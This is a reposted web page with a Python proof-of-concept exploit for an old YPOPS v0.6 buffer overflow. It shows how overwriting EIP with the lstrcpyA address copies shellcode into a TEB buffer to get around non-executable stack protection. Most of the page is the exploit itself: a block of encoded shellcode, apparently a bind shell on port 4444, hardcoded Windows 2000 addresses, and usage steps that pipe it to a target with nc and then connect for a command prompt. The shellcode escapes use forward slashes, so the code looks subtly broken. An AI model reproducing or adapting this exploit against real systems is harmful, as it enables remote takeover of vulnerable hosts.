Defeating Non Executable Stack Protection With TEB Buffer
来源:互联网 发布:淘宝贷款申请 编辑:程序博客网 时间:2024/04/29 18:56
Defeating Non Executable Stack Protection With TEB Buffer Summary Below is an example of exploiting a TEB (Thread Execution Block) buffer and libc that can be used when exploiting a non-executable stack Win32 environment. Details The exploit code below is for an old vulnerability in YPOPS (as reported in: Remote Buffer overflow Vulnerability in YPOPs!). The exploit examples a way to override stack execution protection. The EIP is overwritten with the address of the lstrcpyA function followed by the by the return address (in the TEB), the source and destination buffer addresses. The lstrcpyA copies the attacker supplied payload to the address to the TEB, following which the executions proceeds from there (since it is the return address that we supplied). Exploit Code: #!/usr/bin/env python """ Exploit for an old BoF in YPOPS v0.6 discovered by Behrang Fouldai Coded as a PoC for defeating NoN-Exec stacks and stack protections like overflow guard etc. This exploit utilizes the 520 byte buffer in the TEB (i.e is used for ANSI to Unicode String operations). The EIP is overwritten with the address of lstrcpyA accompanied by the return address, the source and destination buffer addresses. On successful EIP overwrite the lstrcpyA copies the attacker supplied payload to the address in the TEB, following which the executions proceeds from there (since it is the return addr that we supplied). Came across this useful concept in "The shell coders handbook". Can be used for 1) Bypassing stack protections. 2) When none of the regs (ecx,ebx, eax, esp etc) point to our payload. BUFFER LAYOUT |payload | addr of lstrcpyA | addr of buff in TEB | addr of buff in TEB | addr of our payload | ret addr for destination for Addr of our execution Payload Payload Tested on Win2K Adv Server with no patches and overflowguard. This is heavily dependent on the addresses which must be modified according to the versions. 0x77E87E39 --> Address of lstrcpyA from kernel32.dll 0x7ffDE1BC --> Address in TEB buffer to which payload will be copied and execution commences 0x00E6FAB8 --> Address of Payload on stack Shellcode from Sergio alvarez's paper on win32 exploitatiion (gr8 paper). Coded by Varun Uppal (varunuppal@linuxmail.org) greetz to JhaanGi, swatkat_razor, saTurn444 and metasploit crew. gr8 work USAGE: python pop_exp2.py | nc "addr of target host" "target port" Telnet "addr of target host" 4444 for cmd prompt """ import struct exp = "/xd9/xee/xd9/x74/x24/xf4/x5b/x31/xc9/xb1/x5e/x81/x73/x17/xe0/x66" exp += "/x1c/xc2/x83/xeb/xfc/xe2/xf4/x1c/x8e/x4a/xc2/xe0/x66/x4f/x97/xb6" exp += "/x31/x97/xae/xc4/x7e/x97/x87/xdc/xed/x48/xc7/x98/x67/xf6/x49/xaa" exp += "/x7e/x97/x98/xc0/x67/xf7/x21/xd2/x2f/x97/xf6/x6b/x67/xf2/xf3/x1f" exp += "/x9a/x2d/x02/x4c/x5e/xfc/xb6/xe7/xa7/xd3/xcf/xe1/xa1/xf7/x30/xdb" exp += "/x1a/x38/xd6/x95/x87/x97/x98/xc4/x67/xf7/xa4/x6b/x6a/x57/x49/xba" exp += "/x7a/x1d/x29/x6b/x62/x97/xc3/x08/x8d/x1e/xf3/x20/x39/x42/x9f/xbb" exp += "/xa4/x14/xc2/xbe/x0c/x2c/x9b/x84/xed/x05/x49/xbb/x6a/x97/x99/xfc" exp += "/xed/x07/x49/xbb/x6e/x4f/xaa/x6e/x28/x12/x2e/x1f/xb0/x95/x05/x61" exp += "/x8a/x1c/xc3/xe0/x66/x4b/x94/xb3/xef/xf9/x2a/xc7/x66/x1c/xc2/x70" exp += "/x67/x1c/xc2/x56/x7f/x04/x25/x44/x7f/x6c/x2b/x05/x2f/x9a/x8b/x44" exp += "/x7c/x6c/x05/x44/xcb/x32/x2b/x39/x6f/xe9/x6f/x2b/x8b/xe0/xf9/xb7" exp += "/x35/x2e/x9d/xd3/x54/x1c/x99/x6d/x2d/x3c/x93/x1f/xb1/x95/x1d/x69" exp += "/xa5/x91/xb7/xf4/x0c/x1b/x9b/xb1/x35/xe3/xf6/x6f/x99/x49/xc6/xb9" exp += "/xef/x18/x4c/x02/x94/x37/xe5/xb4/x99/x2b/x3d/xb5/x56/x2d/x02/xb0" exp += "/x36/x4c/x92/xa0/x36/x5c/x92/x1f/x33/x30/x4b/x27/x57/xc7/x91/xb3" exp += "/x0e/x1e/xc2/xf1/x3a/x95/x22/x8a/x76/x4c/x95/x1f/x33/x38/x91/xb7" exp += "/x99/x49/xea/xb3/x32/x4b/x3d/xb5/x46/x95/x05/x88/x25/x51/x86/xe0" exp += "/xef/xff/x45/x1a/x57/xdc/x4f/x9c/x42/xb0/xa8/xf5/x3f/xef/x69/x67" exp += "/x9c/x9f/x2e/xb4/xa0/x58/xe6/xf0/x22/x7a/x05/xa4/x42/x20/xc3/xe1" exp += "/xef/x60/xe6/xa8/xef/x60/xe6/xac/xef/x60/xe6/xb0/xeb/x58/xe6/xf0" exp += "/x32/x4c/x93/xb1/x37/x5d/x93/xa9/x37/x4d/x91/xb1/x99/x69/xc2/x88" exp += "/x14/xe2/x71/xf6/x99/x49/xc6/x1f/xb6/x95/x24/x1f/x13/x1c/xaa/x4d" exp += "/xbf/x19/x0c/x1f/x33/x18/x4b/x23/x0c/xe3/x3d/xd6/x99/xcf/x3d/x95" exp += "/x66/x74/x32/x6a/x62/x43/x3d/xb5/x62/x2d/x19/xb3/x99/xcc/xc2" print '/x90'*10+exp+'/x90'*96+ struct.pack('<L', 0x77e87e39)+struct.pack('<L', 0x7ffde1bc)+struct.pack('<L', 0x7ffde1bc)+'/xb8'+'/xfa'+'/xe6'+'/x00' | |||
- Defeating Non Executable Stack Protection With TEB Buffer
- Getting around non-executable stack (and fix)
- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
- Defeating Microsoft Windows XP SP2 Heap protection
- Defeating Lag With Cubic Splines
- Defeating Lag With Cubic Splines
- stack protection canary
- Defeating the Hacker : A Non-Technical Guide to Computer Security
- Defeating the Hacker : A non-technical guide to computer security
- TEB
- Stack buffer overflow (wiki)
- Attempt to execute non-executable address ...
- MySQL with yaSSL SSL Certificate Handling Remote Stack Buffer Overflow Vulnerability
- java direct buffer VS non-direct buffer
- java direct buffer VS non-direct buffer
- Sending Emails with Django CSRF Protection
- Classic Stack Based Buffer Overflow
- 利用ROP绕过DEP(Defeating DEP with ROP)调试笔记
- 情绪控制对于员工和企业的重要性
- 解决Windows XP SP2乱码补丁
- 世界上最好的磁盘碎片整理工具 O&O Defrag
- CCNA 基础练习题(1)
- 在ASP.NET程序中存储和调用word文件
- Defeating Non Executable Stack Protection With TEB Buffer
- [笑语天下]广告傻儿童排行榜前五名
- [软件人生]个人如何成长
- 重启,清零,重建...
- 实施DbUtils [转载]
- dbutils例子
- Jakarta-Common-BeanUtils研究心得(1)
- 设计模式行为模式Behavioral Patterns之FlexibleService模式
- Jakarta-Common-BeanUtils研究心得(2)